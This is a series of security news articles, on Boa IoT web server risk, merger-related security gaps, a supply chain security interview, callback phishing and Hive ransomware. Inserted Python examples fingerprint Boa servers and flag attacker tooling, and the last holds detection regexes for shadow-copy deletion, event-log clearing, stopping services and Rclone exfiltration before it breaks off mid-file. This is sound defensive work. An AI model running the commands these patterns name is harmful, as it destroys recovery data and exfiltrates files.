<![CDATA[Discontinued Web Server Poses IoT Security Risks]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/discontinued-boa-web-server-reveals-iot-supply-chain-risks https://duo.com/decipher/discontinued-boa-web-server-reveals-iot-supply-chain-risks

Researchers with Microsoft are warning that the Boa web server poses a software supply chain risk to Internet of Things (IoT) devices. Despite being discontinued and having known security flaws, the web server is still used in a wide range of routers and cameras, as well as in software development kits (SDKs), to serve management consoles and device sign-in screens.

Microsoft identified the vulnerable open-source component while investigating a suspected Indian electric grid intrusion first detailed by Recorded Future in April, in which attackers used IoT devices as a way to gain a foothold on operational technology (OT) networks. On closer inspection, Microsoft found that Boa web servers were running on all of the IP addresses published as IoCs in Recorded Future’s analysis. Microsoft researchers said the web server, discontinued in 2005, poses a supply chain risk to millions of organizations and devices: in the span of one week they identified 1 million internet-exposed Boa server components globally.

“Without developers managing the Boa web server, its known vulnerabilities could allow attackers to silently gain access to networks by collecting information from files,” according to Microsoft Security Threat Intelligence in a Tuesday analysis. “Moreover, those affected may be unaware that their devices run services using the discontinued Boa web server, and that firmware updates and downstream patches do not address its known vulnerabilities.”

The attacks on Indian critical infrastructure detailed by Recorded Future started in 2020 and were observed as recently as October, Microsoft said. Looking at the IP addresses listed as IoCs by Recorded Future, Microsoft researchers said that half of those addresses returned suspicious HTTP response headers that could be associated with deploying the malware used in the attack, and 10 percent of all the active addresses returning those headers belonged to critical industries.

Microsoft researchers found that the electric grid attack targeted exposed IoT devices running Boa web servers, and they continue to see attackers attempting to exploit Boa flaws, showing that it still poses an attack risk. Known Boa web server vulnerabilities include a high-severity information disclosure bug (CVE-2021-33558) and a high-severity arbitrary file access flaw (CVE-2017-9833), neither of which requires authentication to exploit and both of which, according to Microsoft, can lead to remote code execution.

Despite the severity of these flaws, downstream patch management is extremely difficult, both because the web server has been discontinued and because of how deeply it is built into the IoT device supply chain. In many cases, Boa web servers are bundled into SDKs, which are then built into IoT devices, and those devices are finally sold to end users such as corporate or manufacturing companies.

This poses a number of issues. Both affected device vendors and end users may be completely unaware that their devices are running the discontinued Boa component, because there is limited visibility into the components inside IoT devices and into whether they can be updated. At the same time, updating IoT device firmware does not always fix the specific vulnerable components, in this case the flaws in the Boa web server.

“The known CVEs impacting such components can allow an attacker to collect information about network assets before initiating attacks, and to gain access to a network undetected by obtaining valid credentials,” according to researchers. “In critical infrastructure networks, being able to collect information undetected prior to the attack allows the attackers to have much greater impact once the attack is initiated, potentially disrupting operations that can cost millions of dollars and affect millions of people.”

The complex IoT environment and its barriers to patching have been highlighted by other IoT security issues. When researchers found nine flaws dubbed Name:Wreck in popular TCP/IP stacks used by connected devices, for instance, they warned that many affected devices are not centrally managed and that some of them are mission-critical (such as medical devices or industrial control systems), meaning they would be more difficult to take offline while applying patches.

Despite these challenges, Microsoft researchers recommended that organizations patch vulnerable devices whenever possible, use device discovery to identify vulnerable components across devices, and eliminate unnecessary internet exposure of IoT devices on the network.
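One way to do the discovery step Microsoft recommends, added here as an example in Python rather than anything from Microsoft’s analysis: given raw HTTP responses captured from devices on the network, it parses the header block and reports every device whose Server header advertises Boa, regardless of version, since any Boa instance is a discontinued component. The captures below are constructed sample data, and the banner pattern and host addresses are assumptions for the example.

```python
"""Fingerprint Boa web servers from captured HTTP responses (a device-discovery helper)."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Boa identifies itself in the Server header, e.g. "Server: Boa/0.94.14rc21".
# This banner pattern is an assumption for the example, not an indicator from Microsoft's write-up.
BOA_BANNER = re.compile(r"^Boa/(?P<version>[0-9][0-9A-Za-z.]*)", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    host: str
    version: str


def parse_headers(raw_response: str) -> dict[str, str]:
    """Return the headers of a raw HTTP response as a dict keyed by lower-cased name.

    Handles both CRLF and bare-LF line endings, stops at the first blank line
    (the body is never inspected) and ignores malformed lines without a colon.
    """
    head = re.split(r"\r?\n\r?\n", raw_response, maxsplit=1)[0]
    headers: dict[str, str] = {}
    for line in head.splitlines()[1:]:  # element 0 is the status line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def boa_version(raw_response: str) -> str | None:
    """Return the Boa version advertised by a response, or None if it is not Boa."""
    server = parse_headers(raw_response).get("server", "")
    match = BOA_BANNER.match(server)
    return match.group("version") if match else None


def find_boa(captures: dict[str, str]) -> list[Finding]:
    """Scan a mapping of host -> raw HTTP response and report every Boa instance, sorted by host."""
    findings = []
    for host, raw in captures.items():
        version = boa_version(raw)
        if version is not None:
            findings.append(Finding(host=host, version=version))
    return sorted(findings, key=lambda f: f.host)


# Constructed sample captures (not real devices). Two advertise Boa, one is nginx,
# and one sends no Server header at all.
SAMPLE_CAPTURES = {
    "10.0.0.12": (
        "HTTP/1.1 200 OK\r\nDate: Mon, 21 Nov 2022 10:00:00 GMT\r\n"
        "Server: Boa/0.94.14rc21\r\nConnection: close\r\n"
        "Content-Type: text/html\r\n\r\n<html>login</html>"
    ),
    "10.0.0.13": 'HTTP/1.0 401 Unauthorized\nserver: boa/0.94.13\nWWW-Authenticate: Basic realm="camera"\n\n',
    "10.0.0.14": "HTTP/1.1 200 OK\r\nServer: nginx/1.22.1\r\nContent-Length: 0\r\n\r\n",
    "10.0.0.15": "HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n",
}

if __name__ == "__main__":
    for finding in find_boa(SAMPLE_CAPTURES):
        print(f"{finding.host}: Boa {finding.version} (discontinued component; trace it back to the vendor or SDK)")
```

A banner match is a starting point, not proof of exploitability: devices can rewrite or strip the Server header, so a hit should be confirmed against the device’s firmware inventory, and a miss on a device known to come from an affected SDK should not be read as clean.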

“As attackers seek new footholds into increasingly secure devices and networks, identifying and preventing distributed security risks through software and hardware supply chains, like outdated components, should be prioritized by organizations,” said researchers. “This case displays the importance of proactive cyber security practices and the need to identify vulnerable components that may be leveraged by attackers.”

<![CDATA[Complex M&A Deals Pave Way For Security Gaps]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/complex-m-and-a-deals-can-leave-security-lost-in-translation https://duo.com/decipher/complex-m-and-a-deals-can-leave-security-lost-in-translation

In late August, researchers with IronNet discovered a likely China-based threat actor that had infiltrated a U.S. software company through a troubling avenue: legacy infrastructure from a company acquisition several years prior.

The threat actor used compromised VPN credentials to gain initial access to a compartmentalized segment of the business before deploying the Shack2 and China Chopper web shells. That segment, which contained unpatched legacy systems such as file servers, data repositories and consumer and transaction databases, belonged to a company that had been acquired by the unnamed targeted organization in 2014. In their analysis, the researchers said they believe the attackers were on the network for weeks or even months, conducting staging activity for further exploitation, with a possible end goal of stealing data or finding a pivot point into production environments.

The incident points to the security risks inherent in company merger and acquisition (M&A) activity, which has continued at a strong pace since the pandemic, with deal volumes increasing 64 percent year-over-year in 2021. Any time a company goes through a major change it becomes more vulnerable to cyberattacks, security experts say, but the complexity, speed and secrecy of the acquisition process make M&A a particularly lucrative landscape for threat actors.

“The M&A space is a target with high financial stakes,” said Jason Button, director of Security and Trust M&A with Cisco. “Acquisitions made by large companies usually call for front page attention and that can make the acquired company a target. Hypothetically, take the scenario in which the parent and acquired companies prematurely connect their networks and/or share sensitive data. If the acquired company has poor security, it could be an easy jumping off point to the parent company for much more valuable information.”

The impact of cybersecurity weaknesses or incidents is playing a bigger role in the M&A process: a 2019 Forescout survey found that 81 percent of IT and business decision makers were more focused on an acquisition target’s cybersecurity posture than in the past. Meanwhile, more than half of respondents said they had encountered a critical security issue or incident during an M&A deal that put the deal in jeopardy, showing that security weaknesses affect the deals themselves. After a spate of data breaches was disclosed at Yahoo in 2016, for instance, Verizon in 2017 ended up acquiring the company for $350 million less than originally planned.

“Every environment is different, every acquisition is different, and many times you're navigating not only business strategy but emotional strategy,” said Button. “When it’s made public that a company is being acquired, it can make it a much larger target for bad actors. It is critical to plan and execute security improvements quickly.”

The M&A lifecycle has several stages that at a high level span the initial screening of a company and start of negotiations, the pre-announcement stage, signing and finalizing of the deal and the final integration.

During all of these phases, there are several steps an acquiring company must take to determine the target organization’s security posture. Before negotiations begin, during the initial screening of the target company, the acquirer needs to identify the company’s security and privacy risks by conducting a detailed risk assessment and, for instance, scoping out early indicators of risk from publicly available information. Between pre-announcement and signing, it should review the target’s processes to make sure they align with its own security policies, and once the deal is legally signed it should conduct more active threat hunting and penetration tests.

Visibility is key when approaching these different M&A stages so that the acquiring company can better understand the data that needs to be protected - whether it’s IP, credit card data, or GDPR-regulated information, for instance - and what the risks are that need to be managed.

However, M&A processes are often fast-moving, making it difficult to perform due diligence around important security measures and requirements. According to the Forescout survey, only 36 percent of respondents strongly agreed that their IT teams were given adequate time to review targets’ cybersecurity standards, processes and protocols before completing an acquisition.

The cybersecurity challenge during the M&A process is also exacerbated by a lack of upfront communication that keeps key teams, including security teams, in the loop, and by a lack of documentation that gives insight into the target’s security posture.

Businesses often make the critical error of keeping security teams in the dark about the fact that an M&A deal is being explored, said James Christiansen, Netskope’s vice president of cloud security transformation and leader of the Global Chief Strategy Office. Security experts are typically engaged, along with the broader team, only after the letter of intent is signed, but by then it is too late for them to understand the security posture of the target company as early as they should, he said.

“When going through that first phase of due diligence - before you get to the letter of intent and signatures - the acquiring company often is very very secretive about the fact that they’re going to be acquired,” said Christiansen. “It’s hard to get any real solid data out of them. Sometimes they’ll involve the chief security officer, and show their vulnerability reports and pen test results, but that’s the best you’ll get.”

Morgan Demboski, threat intelligence analyst with IronNet, said that another top challenge for organizations acquiring another company is a lack of insight into documented assets, such as cybersecurity artifacts, technical documentation, and asset and data inventory.

“In the case we detected, the threat actors specifically targeted a network segment that was integrated through a prior company acquisition and contained legacy infrastructure,” said Demboski. “Since this acquisition happened several years prior, there were likely not proper protocols and documentation in terms of technical infrastructure during the acquisition, and the network segment was likely forgotten about by the victim enterprise as a result. Though we do not know exactly how long the threat actor had access to the environment, it is apparent they were targeting the acquired network segment for a reason, likely to exploit the unmonitored legacy infrastructure within it.”

The processes needed to understand the key security risks facing a target company don’t end once an acquisition is signed and announced. When approaching the final integration phase, for instance, Demboski said organizations must have a comprehensive integration strategy, as a lack of protocols can leave large security gaps when converging network systems. That includes dedicating time to asset and data identification, training, and planning the integration strategy to ensure nothing slips through the cracks, said Demboski, as well as establishing a governance model for ongoing incident handling and remediating any outstanding unpatched vulnerabilities.

The establishment of a security culture is one of the most important - and challenging - aspects of this integration phase, as different companies may have different views of the level of risk that they’re willing to take.

“It’s tough to change a culture,” said Christiansen. “In security we’re always looking at how we create a better, more aware culture. But when it comes to culture, it’s really interesting because at the business level there will be two cultures between the [acquiring and acquired] businesses. There might be a more risk averse and risk taking company. So you’ll start articulating those goals and getting them trained on your programs and what you expect. It’s all about encouraging behaviors.”

Across all these various stages of the M&A process, transparency is paramount, and both sides need to set clear expectations early on about priorities and how the companies are going to integrate, said Cisco’s Button.

“I can't stress that enough,” said Button. “Without this both sides will struggle from day one. After that, it's all about identifying, preferably before announcement, any vulnerabilities that need to be resolved in the acquiree’s people, process, or systems. Any or all three can be weak points that will need shoring up immediately.”

<![CDATA[Q&A: Dan Lorenc]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/q-and-a-dan-lorenc https://duo.com/decipher/q-and-a-dan-lorenc

Dan Lorenc, CEO and co-founder of Chainguard, joined Dennis Fisher on the Decipher podcast last week to discuss the rise of software supply chain security threats, the challenges of asset inventory and management, and the value of Sigstore for code signing. This is an edited and condensed transcript of their conversation.

Dennis Fisher: Where did the idea for what Chainguard is doing come from?

Dan Lorenc: I think the overall idea in the space of supply chain security kind of came up gradually. I was at Google for about nine years, like you said. I started there back in 2012, I think it was, and worked on a bunch of different things throughout Google Cloud Platform, kind of from backend infrastructure and then later out toward kind of open source developer tools in the container and Kubernetes space. And Google in the 2012, 2013 timeframe, that was right when big nation state attacks started happening to most of the big tech companies. I've heard similar things from Microsoft and Amazon. Pretty much all of the big tech companies started noticing. This was happening around then; a lot of it's been talked about since, but at the time nobody was talking about it at all. It was top secret, but it was kind of like a crazy revelation that, you know, in your job you might encounter nation states trying to attack you, and, you know, they might even go as far as having folks go get jobs at the company and try to compromise it from inside, and that kind of caught everybody in the industry by surprise back then. It's a little crazy to think about now when it happens all the time and it's pretty obvious, but back then it was new; like, folks weren't used to operating systems that way.

And so we spent a couple of years after that dealing with the fallout from realizing that you can't actually just blindly trust all employees to have access to all sensitive data when your company that size is dealing with that much sensitive information. Systems had to be architected completely differently, baking in that culture of multi-party review and two-factor review to every single thing that happens, not just access to production but code review, compilers, kind of all of that stuff. And then when Kubernetes and containers and public cloud and Docker and everything started catching on a few years later and I started working on that, it was like stepping backwards almost a decade, and it was like, wait a minute, all that stuff we just built is gone now. Everybody's building stuff on Jenkins machines in closets and under their desks, and nobody's tracking what goes into software and how it's getting built. And so that kind of made me pretty paranoid for some of the stuff I was building in open source and shipping, and kind of led me down this rabbit hole. It was pretty boring for a while, like, yeah, nobody really cared about this at all, and honestly it just felt like you're bothering everybody. Until SolarWinds happened, honestly, at the end of 2020; then it was like a night and day switch went off and everybody was like, hey, why haven't we been doing this forever? It's so obvious in hindsight. And so that's sort of how I got into this field, and the field kind of grew up.

Dennis Fisher: There were a lot of outward-facing changes that Google and other companies made, encrypting the links between their data centers and all that kind of stuff, but it's cool to hear about the internal stuff too, where you're looking inside and you're looking around and being like, well, why do we trust this system? Why do we trust this person?

Dan Lorenc: It's a big shift in the way you build systems, and, you know, there's no perfect answer here. The best you can really do is have multiple people look at something in those situations, because at the end of the day you are trusting people. Trusting people blindly is also terrifying, especially when you're working on open source landscapes where you're taking code from anybody on the internet, basically, and if anybody has spent time on the internet, you realize that not everyone on the internet is a nice person and deserves your trust. And yeah, it leads to kind of these inverted security setups in a lot of companies that we see too, just based on policies being applied. If you want to get a new vendor approved at a company, you have to go through a crazy vendor approval process and security audits and budget approvals and all this stuff, and it can take months. But if you just find an open source project on GitHub, you can pull that in without asking anybody in most cases.

Dennis Fisher: You mentioned when the SolarWinds attack happened, which was the end of 2020; it seemed that was kind of a watershed moment for a lot of people in the security industry, and also in the broader software industry, I think, too. They started looking at the dependencies and how many people had SolarWinds in their environment and how would they know if their version was compromised. So did you kind of look around and say, I told you, I was trying to tell you guys?

Dan Lorenc: Yeah, sort of. You know, a lot of it was like, well, you know, you take this as an opportunity to do a tabletop exercise at your company. If this happened to us, like, how hard would this be for us to detect and remediate and fix, and do we actually have any controls in place that would have prevented this? A lot of organizations around the world were probably doing that around that same time, and, you know, I've seen spreadsheets from CISOs of massive companies. They showed me, right after SolarWinds, that attack happened: you know, we did an audit and, you know, we found 400 different Jenkins servers that were in use today across our company, and it took us six months to do this, and there's probably 100 more that have been spun up since then. And we really need to get a handle on this. And it kind of raised that level of awareness to the executive level, which is great; it's kind of the only way you actually address something like this across the industry.

Dennis Fisher: Also, I think there were a bunch of organizations that discovered that they had SolarWinds after that. I remember hearing stories from people that were like, you know, we found out four months later that we did have SolarWinds in our environment. We didn't even know.

Dan Lorenc: Yeah. Accurate asset inventory, accurate asset management, shadow infrastructure, kind of all of those things are a prerequisite to even being able to get started on supply chain security and a lot of folks are still struggling there.

Dennis Fisher: If you don't know what you have, there's no way you can secure it. Are you still having to sort of stress the importance of that to potential customers when you're speaking to them?

Dan Lorenc: Exactly. Yeah, I think if you followed the supply chain security space at all, you probably have heard the term SBOM, software bill of materials. You know, it's being touted as one of the ways to help and improve supply chain security. And for anybody that doesn't know what it is, a software bill of materials is mostly what it sounds like: when you buy a piece of software, the vendor will include a bill of materials, just like when you buy physical goods, explaining what components and subcomponents and libraries are in there. The first part, though, is if you don't know what packaged software you bought in the first place is still running and where it's running, then all the SBOMs in the world won't help. They're kind of one level removed from that. In the SolarWinds case, yeah, if you didn't know SolarWinds itself was running, then it wouldn't matter that you could look up the SBOM or something, and so getting an accurate asset inventory really is step zero in any of these programs. If you don't know what software is running, you can't do patch management. You can't do vulnerability management. You can't ensure that it was built recently, you can't ensure that it was built securely. It's not easy in a lot of organizations to do that. Shadow infrastructure is real. You know, every customer we get into, when we start putting in some of these asset inventory tools, they do find surprises. Everybody always finds surprising things in production. They don't know how that got there. It's scary in a lot of ways. SolarWinds obviously was the first big attack, but one year later, and we're coming up on the one-year anniversary of that again, so two years from the original one, was Log4j, the Log4Shell vulnerability. It's about a worst case scenario vulnerability in an incredibly widely used component, that was about as easy to exploit, with the most severe exploits possible. You know, kind of a worst case scenario from a vulnerability perspective. It's on the list of things attackers are going to try every single time, and it doesn't have to work every time.

Dennis Fisher: When a lot of people think about software supply chain security, they're thinking about something like SolarWinds or Kaseya, where there was an attack that compromised a build or created a malicious version or something and that got pushed downstream. But Log4Shell is I think the much more insidious and problematic version.

Dan Lorenc: They're both big challenges, right? And I think it's part of the confusion in the overall supply chain security space, is all these things get lumped together in one term. But they're completely different, right? You know, the attack on SolarWinds and Log4j are completely different things. You can't even call Log4j itself an attack. It was just an unintended bug that got found. So very different root causes, very different solutions, very different threat models too, and folks are kind of struggling to wrap their heads around the differences there, and I think, yeah, to your point, folks either jump on one side or the other side. Heartbleed was kind of the first eye-opener for most folks that, hey, open source is everywhere and all code has bugs and some of those bugs can lead to security consequences. We should try to fix those, and it's great that folks are trying. We're not going to fix them all, right? It's just software, right? You can't fix all the bugs. We should try though.

Dennis Fisher: I wanted to ask you a little bit about the Sigstore project, because I know you guys are sort of involved in it and I know Google is a big supporter of it. So what's the simplest way to explain to folks how Sigstore works?

Dan Lorenc: Sure, I can start out with a high-level explanation and then talk about some of the history of it. So if you're familiar with Let's Encrypt, it is a free service that gives out TLS certificates for websites. If you remember the internet before maybe five or six years ago, most websites still did not have those certificates. You'd get little red X's when loading those, or it would be HTTP only. And that was really dangerous, right? If you logged into your bank without this, then you're sending your password over plain text on the internet and anybody in the middle can read that and do bad things. These certificates weren't new. They've been around since, like, the early '90s, but they were hard to get because it was manual. They fixed this by building a new standard for websites to automatically go do all of that kind of exchange, so nothing manual over email anymore. You could prove that you were the owner of a website automatically, and they'd give you a certificate. Because it was all automated, they were only good for a couple weeks instead of years, so if somebody stole one, the damage was more limited. Adoption of TLS went from 50% to, like, 95% or 99% over just a couple years when it was made easy for folks. So we've been talking about Let's Encrypt; how this relates to Sigstore is, with Sigstore we try to do that very same thing but for signing code. There's also existing code signing certificates. You're trying to prove which person or company produces some code, rather than encryption. But for the most part, the certificates sort of look the same. You can go buy one today; you can pay a couple hundred bucks, send them a government ID, they'll send it back to you. It's good for a few years, but for the most part, no one in open source was doing that and nobody is doing that outside of the kind of walled gardens where it's required. You need to do that to publish Windows drivers, or you need to do something similar to publish an app to the iPhone store, and this technology is around. It's just hard to use, so we thought, how about we try to automate that, make it easy, make it free for developers and see if folks want to do it, and so that's where Sigstore came in. Sigstore runs a free certificate authority. There's some cool technology with stuff like transparency logs and Merkle trees to make it all work and be trustable. But at the end of the day, a developer can run a command, their browser pops open, they verify their identity with, you know, an email address or a GitHub account or any common identity provider, they get a certificate tied back to that, and then they're good to go. They can sign their code with it, so you can use this with container images and npm packages, Python packages, Java packages; pretty much any open source artifact distribution mechanism now supports Sigstore.

<![CDATA[Threat Actors Find Success in Callback Phishing Attacks]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/threat-actors-find-success-in-callback-phishing-attacks https://duo.com/decipher/threat-actors-find-success-in-callback-phishing-attacks

A threat actor has been using callback phishing - a known social engineering tactic that involves attackers talking to victims over the phone - as a way to download legitimate, trusted systems management tools on victim computers, with the end goal of manually exfiltrating data for extortion.

The threat actor has targeted multiple organizations across the legal and retail sectors from mid-May to late October, in attacks that have cost victims thousands of dollars and have had a high success rate, according to researchers with Palo Alto Networks’ Unit 42. That high success rate is part of the reason callback phishing has been growing in popularity among threat actors overall: according to an August report by Agari, hybrid voice phishing attacks such as callback phishing increased 625 percent in the second quarter of 2022 over the first quarter. BazarLoader operators were first observed using the tactic in attacks that combined emails with phone-based “customer service representatives” who directed victims to download a malicious file.

“By design, this style of social engineering attack leaves very few artifacts because of the use of legitimate trusted technology tools to carry out attacks,” said Kristopher Russo, senior threat researcher with Unit 42, in a Monday analysis. “However, Unit 42 has identified several common indicators implying that these attacks are the product of a single highly organized campaign. This threat actor has significantly invested in call centers and infrastructure that’s unique to each victim.”

The attack starts with a phishing message to a target’s corporate email address that carries an attached invoice (typically for under $1,000) and tells the target that their credit card has been charged for a service. The email includes a phone number and a unique ID, and when the target calls the number to dispute the charge they reach a live agent in an attacker-controlled call center. Under the guise of helping, the “live agent” walks the target through downloading the Syncro remote support tool, which gives the threat actor remote administrative access to the machine and lets it install further tooling.

The threat actor then exfiltrates valuable data from the system with file transfer tools such as Rclone or WinSCP, and later sends an extortion email demanding that the victim pay a fee or see the data released, sometimes threatening to contact the victim’s customers or clients to increase the pressure to pay.
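Because every tool in this chain is legitimate, the detection opportunity is in process telemetry rather than in malware signatures. The following Python is an added example (not from Unit 42 or the article) that triages constructed, Sysmon-style process-creation events: it flags a remote support tool launched from a browser session, as happens when the "live agent" talks the victim through the download, and rates a file transfer tool spawned by that remote support process as high severity. The executable names, the JSON field layout and the host allow-list are assumptions for the example, not indicators from the report.

```python
"""Triage process-creation events for the tool chain used after a callback phishing call."""
from __future__ import annotations

import json
import ntpath
from dataclasses import dataclass

# Tool names come from the Unit 42 description above (Syncro for remote access,
# Rclone and WinSCP for exfiltration). The on-disk executable names, the event
# field layout and the allow-list are assumptions for this example.
REMOTE_SUPPORT = {"syncro.exe", "syncro.installer.exe", "syncro.service.exe"}
EXFIL_TOOLS = {"rclone.exe", "winscp.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
APPROVED_HOSTS = {"it-admin-01"}  # hosts where IT legitimately runs these tools (assumed)


@dataclass(frozen=True)
class Alert:
    host: str
    user: str
    severity: str
    reason: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path ("C:\\x\\Rclone.EXE" -> "rclone.exe")."""
    return ntpath.basename(path).lower()


def triage_event(event: dict) -> Alert | None:
    """Return an Alert for one process-creation event, or None if it looks benign."""
    host = event["host"]
    if host in APPROVED_HOSTS:
        return None
    image = basename(event["image"])
    parent = basename(event.get("parent", ""))
    if image in REMOTE_SUPPORT and parent in BROWSERS:
        # Remote support software fetched from a browser session by an ordinary user
        # is exactly what the call-center "agent" talks the victim into.
        return Alert(host, event["user"], "medium",
                     f"remote support tool {image} launched from browser {parent}")
    if image in EXFIL_TOOLS:
        # A transfer tool started by the remote support process is the exfiltration step.
        severity = "high" if parent in REMOTE_SUPPORT else "medium"
        return Alert(host, event["user"], severity,
                     f"file transfer tool {image} started by {parent or 'unknown parent'}")
    return None


def triage_log(lines: list[str]) -> list[Alert]:
    """Parse JSON-lines process events and collect alerts, skipping unparsable lines."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        alert = triage_event(event)
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample events, one JSON object per line (raw strings keep the JSON backslash escapes).
SAMPLE_EVENTS = [
    r'{"ts":"2022-10-03T14:02:11Z","host":"ws-legal-07","user":"CORP\\jdoe","image":"C:\\Users\\jdoe\\Downloads\\Syncro.Installer.exe","parent":"C:\\Program Files\\Mozilla Firefox\\firefox.exe"}',
    r'{"ts":"2022-10-03T14:40:52Z","host":"ws-legal-07","user":"CORP\\jdoe","image":"C:\\ProgramData\\rclone\\rclone.exe","parent":"C:\\Program Files\\Syncro\\Syncro.Service.exe"}',
    r'{"ts":"2022-10-03T15:01:09Z","host":"it-admin-01","user":"CORP\\helpdesk","image":"C:\\Program Files (x86)\\WinSCP\\WinSCP.exe","parent":"C:\\Windows\\explorer.exe"}',
    r'{"ts":"2022-10-03T15:03:30Z","host":"ws-retail-22","user":"CORP\\asmith","image":"C:\\Windows\\System32\\notepad.exe","parent":"C:\\Windows\\explorer.exe"}',
    "not json at all",
]

if __name__ == "__main__":
    for alert in triage_log(SAMPLE_EVENTS):
        print(f"[{alert.severity}] {alert.host} {alert.user}: {alert.reason}")
```

The parent-process relationship is what separates this from noise: WinSCP on a workstation is common, but a transfer tool whose parent is a freshly installed remote support service on a non-IT host matches the sequence the article describes and is worth an immediate look.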

Over the five-month period of the campaign, researchers have noted a number of changes to the attacks that show that threat actors are evolving their tactics. The wording in the phishing email body has changed, for instance, in a likely move to avoid email protection platform detection. Also, while the extortion campaign recycled phone numbers in its early iterations, later attacks used unique phone numbers for individual victims.

“These cases show a clear evolution of tactics that suggests the threat actor is continuing to improve the efficiency of their attack,” said researchers. “Cases analyzed at the beginning of the campaign targeted individuals at small- and medium-sized businesses in the legal industry. In contrast, cases later in the campaign indicate a shift in victimology to include individuals at larger targets in the retail sector.”

Other research teams have been tracking this callback phishing campaign. Researchers with the Sygnia Incident Response team in July tied the activity to a threat actor called “Luna Moth,” which emerged in March and has run a range of scams that combine corporate data theft with extortion. Researchers with ADVIntel in August attributed the campaign to Silent Ransom, which they said has ties to the Conti group, but Unit 42 researchers said they cannot confirm that tie at this time and are monitoring closely for attribution.

For threat actors, callback phishing requires significant investment, including setting up fake call centers and unique infrastructure for each victim. But the use of live phone interactions, the absence of malware in the initial phishing email and the abuse of legitimate tools make the attack harder to detect and less complex than script-based attacks. Because these attacks are so difficult to sniff out, researchers said that “employee cybersecurity awareness training is the first line of defense.”

“Unit 42 expects callback phishing attacks to increase in popularity due to the low per-target cost, low risk of detection and fast monetization,” according to Russo. “While groups that can establish infrastructure to handle inbound calls and identify sensitive data for exfiltration are likely to dominate the threat landscape initially, a low barrier to entry makes it probable that more threat actors will enter the fray.”

<![CDATA[Hive Ransomware Attacks Target FortiOS, Microsoft Exchange Flaws]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/hive-ransomware-attacks-target-fortios-microsoft-exchange-flaws https://duo.com/decipher/hive-ransomware-attacks-target-fortios-microsoft-exchange-flaws

The Hive ransomware has racked up hundreds of critical infrastructure victims, especially healthcare and public health organizations, through phishing emails and the exploitation of known Fortinet and Microsoft Exchange vulnerabilities, according to a new U.S. government cybersecurity advisory.

In the advisory, the FBI, CISA and the Department of Health and Human Services (HHS) said that Hive ransomware actors had victimized over 1,300 companies globally and received approximately $100 million in ransom payments as of November. Since its discovery in June 2021, Hive has rapidly expanded its reach and evolved quickly, as seen in a new variant observed in February that switched from the Go programming language to Rust.

“Hive ransomware follows the ransomware-as-a-service (RaaS) model in which developers create, maintain, and update the malware, and affiliates conduct the ransomware attacks,” according to the Thursday advisory. "From June 2021 through at least November 2022, threat actors have used Hive ransomware to target a wide range of businesses and critical infrastructure sectors, including Government Facilities, Communications, Critical Manufacturing, Information Technology, and especially Healthcare and Public Health (HPH)."

Because the affiliates deploying Hive rely on differing TTPs, initial access to victim networks varies. Most often, though, the agencies have observed Hive being spread through phishing emails, exploitation of known vulnerabilities, and vulnerable, external-facing remote services such as Remote Desktop Protocol (RDP) and virtual private networks (VPN). In some instances the actors have exploited a known, critical improper authentication flaw in Fortinet's FortiOS SSL VPN (CVE-2020-12812), which lets a user log in without being prompted for the second authentication factor under certain conditions. Hive actors have also exploited the Microsoft Exchange vulnerabilities chained together in ProxyShell: a security feature bypass (CVE-2021-31207), a remote code execution bug (CVE-2021-34473) and a privilege escalation issue (CVE-2021-34523).

After gaining initial access to victim systems, Hive actors have taken several anti-detection and anti-recovery steps, including terminating processes related to backups and antivirus, deleting all volume shadow copies and clearing Windows event logs.

“Hive actors exfiltrate data likely using a combination of Rclone and the cloud storage service Mega.nz,” said researchers. “In addition to its capabilities against the Microsoft Windows operating system, Hive ransomware has known variants for Linux, VMware ESXi, and FreeBSD.”
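Both the callback phishing campaign described earlier (Syncro installed by the victim, data pulled out with Rclone or WinSCP) and the Hive intrusions described here (Rclone to Mega.nz, shadow copies deleted, event logs cleared, backup and antivirus processes killed) leave their clearest trace in process-creation telemetry rather than in the initial email. The following is an added example of triage logic over such events, written for this page; it is not code from Unit 42, the FBI/CISA/HHS advisory or Decipher. The sample events are constructed in the shape of Sysmon Event ID 1 fields, the exact command lines for shadow copy deletion and log clearing are assumptions about how those steps are typically performed, the Syncro file-name match is an assumption, and the backup/AV product names are illustrative. The one non-obvious rule matches Rclone by its command-line syntax rather than its file name, so a renamed binary still fires.

```python
"""Triage constructed Windows process-creation events for the tooling and the
anti-recovery commands described above. Added example; not code from Unit 42,
the FBI/CISA/HHS advisory or Decipher."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    index: int       # position of the event in the input list
    rule: str
    technique: str   # MITRE ATT&CK ID, used here only to route to a playbook
    evidence: str


def _basename(path: str) -> str:
    return re.split(r"[\\/]", path.strip().strip('"'))[-1].lower()


def _norm(cmdline: str) -> str:
    # One canonical form (lower case, no quotes, single spaces) for the regexes.
    return re.sub(r"\s+", " ", cmdline.replace('"', "")).strip().lower()


# rclone syntax is "<verb> <source> <remote>:<path> [flags]". A remote name has two
# or more characters before the colon (so C: is not one) and is not followed by a
# slash (so https:// is not one). Matching on syntax catches a renamed binary.
RCLONE_VERB = re.compile(r"\b(copy|copyto|sync|move|moveto)\b")
RCLONE_REMOTE = re.compile(r"(?<![\w\\/.-])[a-z][\w-]+:(?![/\\])")
# Shadow copy deletion (T1490) and event log clearing (T1070.001); the exact
# command lines are assumptions about how these steps are typically performed.
SHADOW_DELETE = re.compile(r"vssadmin(\.exe)? delete shadows|shadowcopy delete|resize shadowstorage")
LOG_CLEAR = re.compile(r"\bwevtutil(\.exe)? (cl|clear-log)\b|clear-eventlog")
SERVICE_STOP = re.compile(r"\b(net1? stop|sc stop|taskkill)\b")
# Illustrative backup/AV product names; populate from your own inventory.
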